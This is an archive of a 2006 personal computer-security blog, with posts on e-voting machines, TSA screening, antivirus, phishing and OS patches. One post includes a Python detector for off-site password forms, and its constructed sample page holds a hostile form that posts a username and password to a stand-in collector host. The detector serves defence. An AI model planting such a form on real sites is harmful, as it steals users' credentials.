Thursday, November 30, 2006

National Institute of Standards and Technology weighs in on e-voting 

The NIST used to be the National Bureau of Standards. They generally have a profound understanding of what they're talking about.

They are about to recommend decertifying direct recording (DRE) voting machines. Their objection is just what people have been pointing out all along: there's no way to audit or recount.

UPDATE 12/5:

And the government has rejected the NIST advice.

UPDATE 12/7:

An illogical compromise did pass, which says that all newly purchased voting machines have to be auditable but there's no need to replace the ones that are too dangerous to use. Here's a good analysis of the NIST voting machine decision.


Wednesday, November 29, 2006

Feeling safer yet? 

The TSA is confiscating pumpkin pies. So we must really be safe, right?

Earlier this year a man on a flight from Dallas-Fort Worth to Los Angeles brought a four-foot-long sword onto the airplane. Fellow passengers noticed when he had to get help from a flight attendant getting it into the overhead compartment.

Now, if one of the good guys is armed, the plane is actually safer ("You call that a knife? That's a box cutter. (Drawing sword) THIS is a knife!"). Still, that's not something you want flying around in turbulence, and any screener who could miss it...

The TSA has started action in response to the reports that Newark screeners missed 20 of 22 dangerous objects in field tests. What kind of action? I might have tried retraining, studying the break schedule to see if it is enough to let people stay alert, investigating new equipment and so on. But then, I'm a security professional. The TSA is taking action to track down the person who leaked the test results to the press. An entire investigation team went to Newark to identify the leaker. Employees were warned that jail time is a possibility.

In case you've forgotten, Newark was the originating airport for Flight 93.


Your Mac will ask to update. Let it. 

Apple's released a large package of security fixes, including the one for the .DMG-related bug I mentioned earlier. Some of them are pretty important and hard to defend against, so you definitely want the upgrade.


Tuesday, November 28, 2006

Antivirus: free, or paid? 

There are a few free antivirus packages. They're usually not the absolute best, but often beat the performance of some of the famous commercial offerings.

That's the way it turned out when a Watchguard reader submitted an infected file to a web site, VirusTotal, which hosts 27 virus scanners and applies them all to the file you upload. One commercial product, which has been resting on its marketing budget for years while professionals gradually gave up on it, completely failed. The commercial product I use on my own machine, "Nod32", caught it just fine. And so did ClamAV, a free program from the Linux world!


"About three in four US online adults (74 percent) have not installed a hardware firewall" 

PC World reports on a survey sponsored by security firm Checkpoint, according to which most people are still neglecting basic precautions.

The numbers don't feel right. If you run without a firewall, any version of Windows before XP Service Pack 2 has already been taken over, within the first hour after you plugged it in. There must be a lot of people who said "no" to the firewall question who simply don't know that their cable modem has firewall features built in.

The article continues with a list of obvious precautions like knowing who you're sending money to.


Feeling safer yet? Now it's pumpkin pie. 

The Cleveland Plain Dealer reports that the airport is confiscating pumpkin pies.

Now I'd really like to give the security people the benefit of the doubt and assume they've heard about some threat we haven't, like some dangerous substance that looks like pie filling.

So what are they doing with these terrorists' tools, too volatile and dangerous to be allowed on airplanes? They're feeding them to our troops at the USO.


Tuesday, November 21, 2006

Feeling safer yet? 

An airline employee had a hobby: he wrapped rubber bands into a rubber band ball. Unfortunately he put it in his carryon luggage. It showed up in a hand search.

It's unclear why the authorities were so afraid of a rubber band ball. Clearly they were petrified: even after he offered to surrender it to them, they still arrested him and put him in jail.

UPDATE 11/22:

A woman was traveling with frozen homemade tomato sauce. The TSA screener, mindful of the complexities of the situation, called in a supervisor to help. Was frozen tomato sauce a dangerous liquid or not? The supervisor sagely observed "It's not a liquid right now, but it will be soon."

There's profiling, and there's lunacy. Six imams were removed from a plane and searched by bomb-sniffing dogs, were found not to be dangerous, but US Airways refused to sell them a ticket on another flight. If they were safe enough to get on another airline, why weren't they safe enough for US Airways? Well, it all traces back to the reason other passengers complained about them.

They were praying.

Those six were the exact sort of people we need on our side, to turn in potential terrorists and to call their flocks to personal virtue. I hope they are the forgiving sort.


Bookmark your bank and broker 

There's software now that's supposed to help protect you against web sites that impersonate your bank or broker and try to steal passwords and account numbers. It comes in the form of toolbars for your web browser, from many suppliers with many different approaches. How well do they work?

Carnegie Mellon researchers tested anti-phishing toolbars in a recent study. The results are not encouraging.
"[the best products] still missed more than 15% of fraudulent sites. The other four toolbars we tested could correctly identify less than half the fraudulent sites, and one did not correctly identify any fraudulent sites."

Software is doing you some good if it cuts the number of undetected attacks by a factor of 6. But there's an easier way that's more reliable, and the free toolbars come with a high price.

Simply bookmark the places that need high-value passwords and always use the bookmark to go there. Even easier, you may be able to put a link in your browser's navigation bar. Don't follow links from email even if they look right. That will protect you against all but a tiny minority of forgeries.

The price of the free toolbars is that, in the case of those I'm familiar with, they check the URL you're visiting by sending it to a central machine that compares it against a list of known crooked sites. That's right: the company providing the toolbar knows whether you're going to


How secure is your Mac, really? 

I just read a 29-page paper from antivirus firm Symantec about OS X security.

There are only a couple of points that matter to a home user. First, use an external firewall box, or at least turn on the system's firewall (off by default, for some reason, and not as good as an external box).

The other good point they made is that Mac users have gotten so used to installing cool software from random places that they may not be suspicious enough when bad guys begin to target them.

Apple is missing a few clever tricks that could make the innards of a system into barren ground for attackers. Right now Microsoft is ahead of them on that front.

UPDATE 11/22:

In fact, a bad security problem just got announced. It's possible for bad guys to create a damaged .DMG file which can take over your computer completely if you open it. And Safari will open it for you automatically. So, think twice about the trustworthiness of the places you download from, and for the moment turn off Safari's option to automatically open "safe" files.

UPDATE 12/1:

Or maybe not. Another researcher spent three days looking at the report and analyzing what the Mac was doing with the damaged .DMG. It's complicated, but the upshot seems to be that the operating system will complain bitterly, stop working, but not run off the rails in any security-related way.


Heads up, folks, this one is serious 

If your web browser offers to "remember" passwords for you, it can also leak them to places on the web that you didn't intend.

This was first noticed in Firefox, and I gather it's possible but more difficult in Internet Explorer.

Bad guys can build web pages (and they already are) that request your username and password for the site you're on and then send it to another site. For several reasons, you're most likely to be attacked on a place that allows user-contributed content, for example MySpace.

Right now it's hard to defend yourself. There's no software patch yet to fix the vulnerability. The best advice anyone has is not to save passwords in your browser.

Details for your technical friends
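
For anyone who runs a site that accepts user-contributed content, here is one way to look for the kind of page described above: a form that contains a password field but sends its contents to a different site. This is an added example, not code from the linked report; the page markup and the `.example` host names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a profile page on a site that allows user-supplied HTML.
SAMPLE_URL = "https://social.example/profile/123"
SAMPLE_PAGE = """
<form action="/login" method="post">
  <input name="user"><input type="password" name="pw">
</form>
<div class="user-content">
  <form action="https://collector.example/c" method="post">
    <input type="text" name="user"><input type="PASSWORD" name="pw">
  </form>
</div>
<form action="https://search.example/q"><input name="q"></form>
"""


def origin(url):
    """Return (scheme, host, port) with default ports filled in."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or {"http": 80, "https": 443}.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


class PasswordFormAuditor(HTMLParser):
    """Records each <form> and whether it contains a password field."""

    def __init__(self, page_url):
        super().__init__(convert_charrefs=True)
        self.base_url = page_url   # replaced by the first <base href>, if any
        self.base_seen = False
        self.current = None        # form currently being parsed
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href") and not self.base_seen:
            self.base_url = urljoin(self.base_url, a["href"])
            self.base_seen = True
        elif tag == "form":
            self.finish_form()     # tolerate a missing </form>
            self.current = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "").lower() == "password":
                self.current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.finish_form()

    def finish_form(self):
        if self.current is not None:
            self.forms.append(self.current)
            self.current = None


def find_offsite_password_forms(html, page_url):
    """Return the resolved targets of password forms that post to another origin."""
    auditor = PasswordFormAuditor(page_url)
    auditor.feed(html)
    auditor.close()
    auditor.finish_form()          # a form left open at end of input still counts
    findings = []
    for form in auditor.forms:
        if not form["has_password"]:
            continue
        # An empty action submits back to the page itself (or its <base>).
        target = urljoin(auditor.base_url, form["action"].strip())
        if origin(target) != origin(page_url):
            findings.append(target)
    return findings


if __name__ == "__main__":
    for target in find_offsite_password_forms(SAMPLE_PAGE, SAMPLE_URL):
        print("password form posts off-site:", target)
```

The same-site login form and the password-free search form are left alone; only the form inside the user-supplied block is reported.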


Monday, November 20, 2006

Legalized computer intrusion? 

Congress is considering legislation to allow vigilantes to attack other people's computers.

Is this to allow shutting down spammers? To strike back at computer criminals?

No, it's to give studios and record labels the power to crack security on file sharing services.

the measure would permit copyright holders to perform nearly unchecked electronic hacking if they have a "reasonable basis" to believe that piracy is taking place.

This is wrong in every way I can think of.

Either you have rule of law or you don't. This bill would put copyright holders above the law. The legislation would immunize groups such as the Motion Picture Association of America and the Recording Industry Association of America from all state and federal laws if they disable, block or otherwise impair a "publicly accessible peer-to-peer network." The voice messaging system Skype is peer to peer; you can send files to chat partners; will the RIAA try to destroy it?

There will certainly be innocent victims. Under the law, the innocent victims wouldn't have meaningful legal recourse.

File sharing systems distribute free software with the permission of the volunteers who write the software. Under this law, a studio could destroy the legitimate uses if there were also people downloading music without authorization.

If there's no effective legal recourse, then there's nothing except the conscience of the record company executives to stop them from attacking anyone they choose, "pirate" or not.

It's real easy to hit bystanders with some of the attack tools out there.

If you're in the districts of Howard Berman, D-CA, or Howard Coble, R-NC, this is the kind of representation you're getting.


Friday, November 17, 2006

What happens when bad software gets on your computer? 

Have you ever seen the movie "Risky Business"? Bad software invites its friends over, starts illegal businesses in your computer, and generally makes your life miserable.

Let's take a look at a particular piece of malware, one that's in the news because it's responsible for the recent sudden upsurge in spam. As usual everyone's given it a different name, but the most common is "Spamthru".

It all starts when you run software from a source you don't know and trust. Maybe it's just a small program that goes out on the Internet to download and run the latest, freshest, copy of a large program that does bad things, in this case Spamthru.

Spamthru changes your Windows setup to ensure that it runs on startup. It uses several ways of doing that, including one or two that I'd never heard of.

Then it installs and runs an antivirus program. "What?!", you say. It's like the bread mold that secretes penicillin to kill off its competitors. Spamthru is trying to make sure it doesn't get slowed down by all the other malicious software on your Windows machine.

Some malware tries to shut down your own antivirus software or at least make it impossible for you to update it. Spamthru does the latter.

Then it listens for orders from the humans who control it. The whole point of this was to take control of your computer. In the old days (like a year or two ago), a program like Spamthru would log in to a chat room and wait for its human master to type in commands. Spamthru instead uses a clever distributed command and control system that will keep on working even if law enforcement or responsible ISPs shut down a server or two.

The orders it can understand and obey include "update yourself", and the big ones: "get a template for a spam message and a list of victims" and "send out spam". That's where they make their money. The criminals who caused this whole problem rent out use of the 70,000 personal computers they control to spammers. It does a hideously good job. It adds random elements to the spam to confuse spam filters. It sends the meat of the spam as a picture, which is hard for filters to read, and it randomizes the size of the picture and adds a few random dots to it so that filters can't just learn to block a particular image.

Do you still want to take a chance on installing software from random strangers?

Joe Stewart's technical analysis of Spamthru


Thursday, November 16, 2006

One very good sentence about computer security 

A column of security advice from the Wall Street Journal's Walter Mossberg says something insightful about all those email ads for drugs and other questionable goodies. He writes "Treat such come-ons the way you'd treat a stranger in a bad neighborhood who made such promises".

Bingo. Because that is exactly what's happening. The world of spam is a bad neighborhood.

All the rest of his advice is sound, but that one sentence is excellent.


Wednesday, November 15, 2006

Happy Patchday 

Don't put off running Windows Update today. Some of the security problems it fixes are critical, and worse yet there are already programs bad guys can use to attack through those vulnerabilities.


Tuesday, November 14, 2006

It's hard to tell if email is impersonating your bank 

The perpetrators of phishing scams, who pretend to be your bank and try to trick you into giving them passwords, have been getting slicker over time. They look more and more plausible.

Meanwhile banks have been getting sloppier. Citibank sent a mass mailing that looked a lot like a phishing scam.


Sunday, November 12, 2006

A different kind of wireless security problem 

We knew about the risk of eavesdropping. This new problem is different and worse.

There's software, a "driver", that makes your wireless card work. This software runs with high privileges, in the sensitive innards of your operating system. What if it has a bug, a security bug which allows someone to take it over? Then you've lost control of your machine. That would be even worse than the usual ways of getting infected because it would require absolutely no action on your part, just having your wireless system turned on within range of somebody malicious.

Broadcom, which makes the inner workings of WiFi cards from several different name brands, put such a bug into their driver software. If your card says "Linksys", there's a patch. If it's from somebody else, you're stuck phoning the support line for your equipment and arguing with people who won't know what you're talking about: "Broadcom, in Irvine, Calif., has released a fixed driver to partners, but the availability of fixes for end-users appear to be very limited."

Hype or Horror?

There are two bits of good news in this. One is that there's no evidence that bad guys are actually attacking through this security hole (yet). The other is that it's not the kind of attack that pays big money for them. They could only infect a few computers at a time, or at most several dozen, with an attack like this. They could get tens of thousands of zombie computers under their control by using an Internet-based attack.

Details for your technical friends: The SANS report listing affected versions and files and The original security bug report about the Broadcom equipment.

UPDATE 11/15:

You're taken care of if you own a Dell. Glenn Fleishman's Wi-Fi Net News (read it if you have any interest in the industry) reports that Dell has released a patch for their computers.

UPDATE 11/22:

It's not your imagination. News like this does come in waves. What happens is that security people who hear about a new category of problem turn their attention to finding new examples. That's why we've now found out about similar vulnerabilities in wireless equipment from D-Link and from Netgear. For links to patches, I'll refer you to someone I respect who's already put the list together, Roger Grimes.


Thursday, November 09, 2006

"Experts remain at odds over e-voting" 

That's the headline in the Chronicle of Higher Education about e-voting.

I snapped to attention. I wanted to learn from the thoughts of anyone who had a positive opinion of voting machines and who was an expert in auditing, IT systems design, user interface design, IT operations, or computer security.

So I zeroed in on who the experts were.

Says the article, "a group of political-science professors".


Voting machines: how do the alternatives work? 

There's a good Fortune article about the history and status of voting machines with a really good (not perfect, but good) comparison chart of what you need to worry about with different kinds of technology.

They understate the problems with all-electronic systems. There are lots of ways to cheat besides what they mention, including simply editing the results at the central machine that adds up the precinct results. Yes, the operator can change the totals, a feature which pushes the limits of what you can explain as simple designer incompetence.

They overstate the problems with paper. "Difficult and time-consuming to count in large quantities"? Have each precinct report its own results, all of them counting at the same time. The big problems with paper are ambiguous and "spoiled" ballots.


Wednesday, November 08, 2006

How did the voting machines work? 

It was a mixed bag yesterday, and at first glance looks more like breakdowns than like election stealing.

The most alarming reports were of "vote flipping", machines registering a vote different from what the voter intended. That was happening on touch screen machines. It's possible that the machines simply lost track of which touch went with which part of the ballot -- they can fail that way -- but nobody knows for sure. Computer science prof and founder of, David Dill, says "It could be a calibration problem with the touchscreens, but I'm not sure that anyone really knows yet because no one's looked at it. My answer as a computer scientist is that I want facts". It sure would be a dumb way to try to steal an election.

Take a close look at the review screen if you vote on one of those machines.

And inevitably, the machine vendors blame the voters: "Michelle Shafer, a spokeswoman at e-voting machine vendor Sequoia Voting Systems, said the perceived problem of vote flipping is definitely human error". Diebold spokesman David Bear goes even further: "'It's not a problem,' Bear said. 'It doesn't exist.'"

Less alarmingly, there were plenty of mechanical breakdowns that forced the polls to stay open late in several places. Colorado had people waiting in line for two hours. "In Campbell County, Ky., an e-voting machine began smoking soon after polls opened at 6 a.m., said Les Fugate, spokesman for Kentucky Secretary of State Trey Grayson. 'That one truly malfunctioned, and it just smoked and was pulled' out of service, he said. The eSlate touchscreen machine from Hart InterCivic Inc. in Austin had been used without incident in the May primary when it was brand new, he said." Where this got bad is in places where voters went away before they had a chance to vote.

The terrible problem, which may keep the elections from convincing voters that the outcome was fair, is that there's no way to recount the purely electronic machines. The Virginia Senate race ended with a difference of 7,000 votes out of 2.3 million.

The most interesting thing is that the party in power lost bigtime, which wouldn't have happened if there had been widespread rigging of the machines. One theory about why tampering didn't happen: "This year's scrutiny by the media, which detailed the potential problems with e-voting, may have headed off any attempted hackings that could have flipped the results of a major race, said Bruce Funk, the former elections director for Emery County, Utah, and an outspoken critic of touch-screen systems". The price of freedom is eternal vigilance...

I remain opposed to computerized voting machines, as does every security professional I've heard from on the subject.

UPDATE 11/10:

This one isn't just a "glitch". Sarasota County, Florida, is missing 18,000 votes in the tight race for the 13th District House seat. The current margin is 368 votes. The missing 18,000, one out of every seven ballots cast, are cases where someone cast a ballot but somehow nothing registered for the House race, just for the other items on the ballot.

The voting machine vendor denies everything:
"However, we have been in contact with the supervisor of elections, who has emphasized that the voting equipment functioned well," ES&S said. "The touch-screen system used in Sarasota County provides unlimited opportunity for a voter to make and change selections before a ballot is cast. Therefore, according to the supervisor of elections, under-votes were a result of an intentional choice not to make a selection in the congressional race or unintentional omission of a selection."

Personal opinion: this is almost certainly a bug of some sort. Actual cheating could and would be much harder to detect.

An opinionated piece by an opinionated man argues that the problems were severe and pervasive, and points to the VotersUnite! database of e-voting problem reports. Brad isn't willing to tolerate the headaches we take for granted with new computer systems, not in a critical application like voting: "It is not yet a felony in the United States of America to turn a legally registered voter away from the polls without allowing him to cast a vote. But it damned well should be", he writes.

UPDATE 11/23

In the Florida election where 18,000 votes just disappeared from one county and not from others, it turns out that the county was friendly to the candidate who allegedly lost by less than 400 votes. Do the arithmetic: if she had been getting as few as 53% of the missing votes she would have won. This is America, so she's suing demanding a revote.


So, what's a "trustworthy" web site anyway? 

The people who run a high-profile site like aren't going to booby-trap it with spyware. But what about high-profile, well-respected sites that allow users to contribute?

They fixed the problem really fast, but on Wikipedia some crook changed the article about the Blaster worm to include a link, supposedly to a patch, but actually to a piece of malicious software.

Trustworthy, these days, means not just being well known and respectable but also means being willing and (the hard part) able to prevent or at least detect and remove malicious material in user comments, uploaded articles and videos, and so on.

Antivirus and staying up to date on security patches will protect you from a lot of things.


Sunday, November 05, 2006

"Extremely critical" security bug for Windows users 

The Microsoft security bulletin says that it affects just about every version of Windows. This is another bug in which using Internet Explorer to look at the wrong web site will let the bad guys take over your computer. Bad guys are already attacking through this security hole.

IE7 is affected.

Until Microsoft releases a patch, it looks like turning off Active Scripting would protect you at the cost of making a lot of web sites stop working right for you. Really, you should continue running Firefox as your default web browser until you're running IE 7 on Vista and it's had some time to prove itself.


Friday, November 03, 2006

Great piece about how to size up risks 

Executive summary: humans are lousy at figuring out what's more dangerous and more worthy of protective efforts.

My favorite security guru, Bruce Schneier, quotes Harvard psychology professor Daniel Gilbert about risk perception.

The most important point for computer security is the first one, "We over-react to intentional actions, and under-react to accidents, abstract events, and natural phenomena". Whether you lose all your files to a system crash or to a destructive program, you're just as hurt and need to do the same things to recover (hint: do you have recent backups?). Destructive viruses are rare these days and system crashes are all too common. I advise my clients to prepare for natural disasters before they prepare for terrorist attacks.


Thursday, November 02, 2006

HBO e-voting documentary tonight 

The title is "Hacking Democracy", and voting machine vendor Diebold has demanded that HBO not show it.
It got an unfavorable review from the Washington Post.
If you missed it, the program is available at Google Video.


Beware of people reaching for the back of the voting machine 

Some voting machines have a yellow button in back that lets you repeat votes.

Words fail me. I can actually see ways this could have happened accidentally but all of them seem breathtakingly stupid.


I've talked about coffee shop WiFi 

Would you like to see examples of what can happen if you're on a network where everyone can see everyone else's traffic?

Older cable modem systems were like party lines where everyone's traffic was mixed together. Here's an article about how you can see other people's passwords on a cable modem. WiFi networks have the same problem.

The article's got more technical detail than you probably want but the main point is that too many places that ask for your password don't arrange to scramble it as it goes over the wire or over the air. If they did you'd be safer.


Is the Mac more secure? 

You won't find an answer here, but it does have a set of security and privacy features that Windows is only just catching up with.

Privacy author Simson Garfinkel has an article about what Mac OS X security features can do for you.


Internet Explorer 7 is now an automatic update 

This is boring, isn't it? You've got a lot more going on in your life than watching for new revisions of a web browser.

This one may improve your computer security quite a bit. It's too early to tell, but I've looked over the kinds of work Microsoft has done and it all makes sense and the changes are close to what I would have prescribed to make Internet Explorer less dangerous.

If you regularly visit places where Firefox doesn't work well, I recommend giving IE7 a try. To see what Microsoft says and download it if you don't want to wait for the automatic update, see the IE7 introduction page.

UPDATE 11/3:

If you have any of the surprises that tend to follow upgrades, here's a guide to troubleshooting IE7.

